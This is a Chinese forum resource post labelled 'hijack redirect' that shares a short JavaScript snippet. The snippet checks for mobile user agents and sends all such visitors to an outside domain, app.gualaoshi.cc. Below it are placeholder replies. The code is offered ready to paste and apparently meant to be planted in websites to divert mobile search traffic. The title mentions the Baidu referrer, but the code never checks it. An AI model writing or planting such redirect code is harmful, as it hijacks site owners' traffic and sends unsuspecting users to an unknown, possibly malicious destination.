找回密码
 立即注册
首页 资源区 代码 百度移动来路跳转js代码

劫持跳转 百度移动来路跳转js代码

新程序 2025-4-30 12:49:11
百度移动来路跳转js代码

  1.     <script>
  2.         function isMobile() {
  3.             const userAgent = navigator.userAgent || navigator.vendor || window.opera;
  4.             return /android|iphone|ipad|ipod|blackberry|iemobile|opera mini/i.test(userAgent.toLowerCase());
  5.         }

  6.         if (isMobile()) {
  7.             window.location.href = "https://app.gualaoshi.cc";
  8.         } else {

  9.         }
  10.     </script>
复制代码




相关推荐

2025-10-27 00:46:50

举报

2025-12-6 06:51:12

举报

2025-12-10 15:44:45

举报

2026-1-2 15:03:34

举报

很好很强大  我过来先占个楼 待编辑
2026-1-14 07:24:19

举报

2026-1-19 21:25:06

举报

2026-1-21 16:37:51

举报

很好很强大  我过来先占个楼 待编辑
2026-1-28 03:05:31

举报

12下一页
您需要登录后才可以回帖 登录 | 立即注册
发帖

5

粉丝关注

1141

主题发布

板块介绍填写区域,请于后台编辑